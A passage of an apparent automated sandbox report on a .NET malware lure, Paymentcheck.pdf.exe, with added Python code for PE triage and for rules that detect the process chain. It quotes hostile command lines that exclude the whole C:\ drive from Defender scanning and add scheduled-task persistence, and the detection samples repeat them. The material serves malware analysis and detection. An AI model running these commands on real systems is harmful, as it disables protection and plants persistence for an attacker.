Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_0619B82B push es; ret | 13_2_0619B83C
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_0619182F push eax; retf 0005h | 13_2_06191832
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_0619197F push ecx; retf 0005h | 13_2_06191982
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_0619F9DA pushad ; iretd | 13_2_0619F9E5
Source: initial sample | Static PE information: section name: .text entropy: 7.98540121704
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | File created (dropped file): C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | File created (dropped file): C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | File created (dropped file): C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
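Two of the static findings above, the TimeDateStamp 0xBB2F66FF that decodes to a date in 2069 and a .text section with entropy 7.985 out of a possible 8.0, are cheap to reproduce on any sample before it is detonated. The following is an added worked example and not code from the Joe Sandbox report: it reads the timestamp from the COFF file header, computes per-section Shannon entropy, and flags a timestamp later than the analysis date or a section above an assumed 7.0-bit threshold. ANALYSIS_DATE and the minimal PE-shaped blob returned by build_sample_pe are constructed assumptions; the blob stands in for the real Paymentcheck.pdf.exe and is not that file.

```python
# Added static triage example (not code from the report): PE compile timestamp plus
# per-section entropy, the checks behind the "suspicious time stamp" and the
# ".text entropy 7.985" findings above. The PE blob built below is constructed.
import math
import struct
from collections import Counter
from datetime import datetime, timezone
from typing import Dict, List, Tuple

PACKED_THRESHOLD = 7.0  # assumed cut-off: code sections near 8.0 bits/byte are packed or encrypted
ANALYSIS_DATE = datetime(2021, 7, 20, tzinfo=timezone.utc)  # assumed analysis date, not from the report


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(blob: bytes) -> Tuple[int, List[Tuple[str, bytes]]]:
    """Return (TimeDateStamp, [(section name, raw section bytes)]) from a PE image."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsec, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, e_lfanew + 4)
    off = e_lfanew + 24 + opt_size  # first IMAGE_SECTION_HEADER follows the optional header
    sections = []
    for _ in range(nsec):
        name, _, _, raw_size, raw_ptr = struct.unpack_from("<8sIIII", blob, off)
        sections.append((name.rstrip(b"\0").decode(), blob[raw_ptr:raw_ptr + raw_size]))
        off += 40  # sizeof(IMAGE_SECTION_HEADER)
    return ts, sections


def triage(blob: bytes, reference: datetime = ANALYSIS_DATE) -> Dict[str, object]:
    """Decode the timestamp and score each section; reference must be timezone-aware."""
    ts, sections = parse_pe(blob)
    compiled = datetime.fromtimestamp(ts, tz=timezone.utc)
    entropies = [(name, shannon_entropy(raw)) for name, raw in sections]
    return {
        "timestamp": compiled,
        "future_timestamp": compiled > reference,
        "sections": entropies,
        "packed_sections": [name for name, h in entropies if h >= PACKED_THRESHOLD],
    }


def build_sample_pe(timestamp: int, text: bytes) -> bytes:
    """Minimal PE-shaped blob with one .text section: constructed test input, not a runnable binary."""
    e_lfanew = 64
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0, 0x102)
    raw_off = e_lfanew + 4 + 20 + 40
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text), raw_off,
                      0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + coff + sec + text


if __name__ == "__main__":
    # 0xBB2F66FF is the TimeDateStamp the report decodes to Sun Jul 7 18:05:51 2069 UTC.
    print(triage(build_sample_pe(0xBB2F66FF, bytes(range(256)) * 4)))
```

A future-dated timestamp is a triage signal rather than proof on its own: reproducible builds (the MSVC /Brepro option) replace the field with a hash of the image and some toolchains zero it, so pair it with the section entropy and with the in-memory Assembly::Load(byte[]) calls recorded under Data Obfuscation before drawing a conclusion.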

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe\:Zone.Identifier:$DATA
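The process tree and the persistence evidence above give the whole chain in order: a double-extension lure (Paymentcheck.pdf.exe), a VBS dropped into the user's Temp directory and run by wscript.exe, wscript.exe starting powershell.exe to add Defender exclusions for C:\ and for the dropped msbuildd.exe, a RegAsm.exe copy executed from Temp rather than from the .NET Framework directory, scheduled tasks imported from XML files in Temp, and the Startup value under User Shell Folders rewritten while msbuildd.exe is placed in a csrsss directory under Start Menu\Programs. The rules below are an added detection example and not part of the report or of any vendor ruleset: the Event schema, rule names and SAMPLE_EVENTS are assumptions modelled on the command lines the report shows, and the two benign control events at the end are constructed to show what the rules ignore.

```python
# Added detection example (not from the report). Event schema, rule names and the
# sample events are assumptions modelled on the command lines shown in the report.
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass
class Event:
    kind: str                 # "process" or "registry" (assumed normalised form)
    image: str                # full path of the acting process
    cmdline: str = ""
    parent_image: str = ""
    target: str = ""          # registry value path for "registry" events


TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
DOUBLE_EXT_RE = re.compile(r"\.(pdf|doc|docx|xls|xlsx|jpg|png|txt)\.exe$", re.IGNORECASE)
FRAMEWORK_RE = re.compile(r"^C:\\Windows\\Microsoft\.NET\\Framework(64)?\\", re.IGNORECASE)
STARTUP_VALUE_RE = re.compile(r"\\Explorer\\User Shell Folders\\Startup$", re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def excluded_paths(cmdline: str) -> List[str]:
    """Paths handed to Set-MpPreference -ExclusionPath, comma-split with quotes removed."""
    m = re.search(r"-ExclusionPath\s+(.+?)(?:\s+-|$)", cmdline, re.IGNORECASE)
    if not m:
        return []
    return [p.strip().strip("'\"") for p in m.group(1).split(",") if p.strip()]


def double_extension_exe(e: Event) -> bool:
    # Lure name such as Paymentcheck.pdf.exe: a document extension in front of .exe
    return e.kind == "process" and bool(DOUBLE_EXT_RE.search(basename(e.image)))


def script_host_runs_temp_script(e: Event) -> bool:
    return (e.kind == "process" and basename(e.image) in SCRIPT_HOSTS
            and bool(TEMP_RE.search(e.cmdline)))


def script_host_spawns_defender_exclusion(e: Event) -> bool:
    return (e.kind == "process" and basename(e.image) == "powershell.exe"
            and basename(e.parent_image) in SCRIPT_HOSTS
            and re.search(r"Set-MpPreference\b.*-ExclusionPath", e.cmdline, re.I) is not None)


def defender_drive_root_excluded(e: Event) -> bool:
    # Excluding C:\ switches scanning off for the whole volume, not just the dropped file.
    return (e.kind == "process"
            and any(re.fullmatch(r"[A-Za-z]:\\?", p) for p in excluded_paths(e.cmdline)))


def regasm_outside_framework_dir(e: Event) -> bool:
    # The genuine RegAsm.exe only ships under the .NET Framework directory.
    return (e.kind == "process" and basename(e.image) == "regasm.exe"
            and not FRAMEWORK_RE.match(e.image))


def schtasks_xml_from_temp(e: Event) -> bool:
    return (e.kind == "process" and basename(e.image) == "schtasks.exe"
            and re.search(r"/create\b", e.cmdline, re.I) is not None
            and re.search(r"/xml\s+\S*\\AppData\\Local\\Temp\\", e.cmdline, re.I) is not None)


def startup_shell_folder_redirected(e: Event) -> bool:
    # Rewriting this value moves the user's Startup folder wherever the writer chooses.
    return e.kind == "registry" and bool(STARTUP_VALUE_RE.search(e.target))


RULES: Dict[str, Callable[[Event], bool]] = {
    "double_extension_exe": double_extension_exe,
    "script_host_runs_temp_script": script_host_runs_temp_script,
    "script_host_spawns_defender_exclusion": script_host_spawns_defender_exclusion,
    "defender_drive_root_excluded": defender_drive_root_excluded,
    "regasm_outside_framework_dir": regasm_outside_framework_dir,
    "schtasks_xml_from_temp": schtasks_xml_from_temp,
    "startup_shell_folder_redirected": startup_shell_folder_redirected,
}


def evaluate(events: List[Event]) -> List[Tuple[int, str]]:
    """(event index, rule name) for every rule that fires, in event order."""
    return [(i, name) for i, e in enumerate(events) for name, rule in RULES.items() if rule(e)]


USER = r"C:\Users\user"
SAMPLE_EVENTS = [  # constructed to mirror the report's process tree; indices are fixed
    Event("process", USER + r"\Desktop\Paymentcheck.pdf.exe",
          "'" + USER + r"\Desktop\Paymentcheck.pdf.exe'", r"C:\Windows\explorer.exe"),
    Event("process", r"C:\Windows\SysWOW64\wscript.exe",
          r"'C:\Windows\System32\WScript.exe' '" + USER + r"\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs'",
          USER + r"\Desktop\Paymentcheck.pdf.exe"),
    Event("process", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
          r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'"
          + USER + r"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'",
          r"C:\Windows\SysWOW64\wscript.exe"),
    Event("process", USER + r"\AppData\Local\Temp\RegAsm.exe", USER + r"\AppData\Local\Temp\RegAsm.exe",
          USER + r"\Desktop\Paymentcheck.pdf.exe"),
    Event("process", r"C:\Windows\SysWOW64\schtasks.exe",
          r"'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml '" + USER + r"\AppData\Local\Temp\tmp715E.tmp'",
          USER + r"\AppData\Local\Temp\RegAsm.exe"),
    Event("registry", USER + r"\Desktop\Paymentcheck.pdf.exe",
          target=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup"),
    # Benign controls: the real RegAsm.exe, and a task imported from ProgramData rather than Temp.
    Event("process", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
          "RegAsm.exe MyLib.dll /codebase", r"C:\Windows\System32\cmd.exe"),
    Event("process", r"C:\Windows\System32\schtasks.exe",
          r"schtasks.exe /create /tn Backup /xml C:\ProgramData\backup.xml", r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for idx, rule_name in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule_name}")
```

defender_drive_root_excluded deliberately ignores the parent process: an exclusion of a drive root blanks out scanning for the entire volume whoever adds it, so it is worth an alert even when the caller is an administrator's console. The two control events at the end of SAMPLE_EVENTS (the genuine RegAsm.exe and a task imported from ProgramData) produce no hits, which is the false-positive check to keep when tuning the regular expressions for your own telemetry.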

Hooking and other Techniques for Hiding and Protection:

Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.exe | Static PE information: Paymentcheck.pdf.exe
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Process information set: NOOPENFILEERRORBOX (41 identical entries)
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6860, type: MEMORYSTR
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Window / User API: threadDelayed 2164
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Window / User API: threadDelayed 3128
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Window / User API: threadDelayed 6418
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 440
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe TID: 6080 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 5548 | Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6276 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 5536 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5612 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 7144 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into foreign processes
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 402000
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 420000
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 422000
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 652008
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp'
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp'
Source: RegAsm.exe, 0000000D.00000002.933131448.0000000002BB5000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.930540540.0000000003280000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: RegAsm.exe, 0000000D.00000002.930299942.00000000010F0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.930540540.0000000003280000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000000D.00000002.930299942.00000000010F0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.930540540.0000000003280000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp | Binary or memory string: Program ManagerD$Rk
Source: RegAsm.exe, 0000000D.00000002.932300920.00000000029DB000.00000004.00000001.sdmp | Binary or memory string: Program Managerx
Source: RegAsm.exe, 0000000D.00000002.930299942.00000000010F0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.930540540.0000000003280000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Users\user\Desktop\Paymentcheck.pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
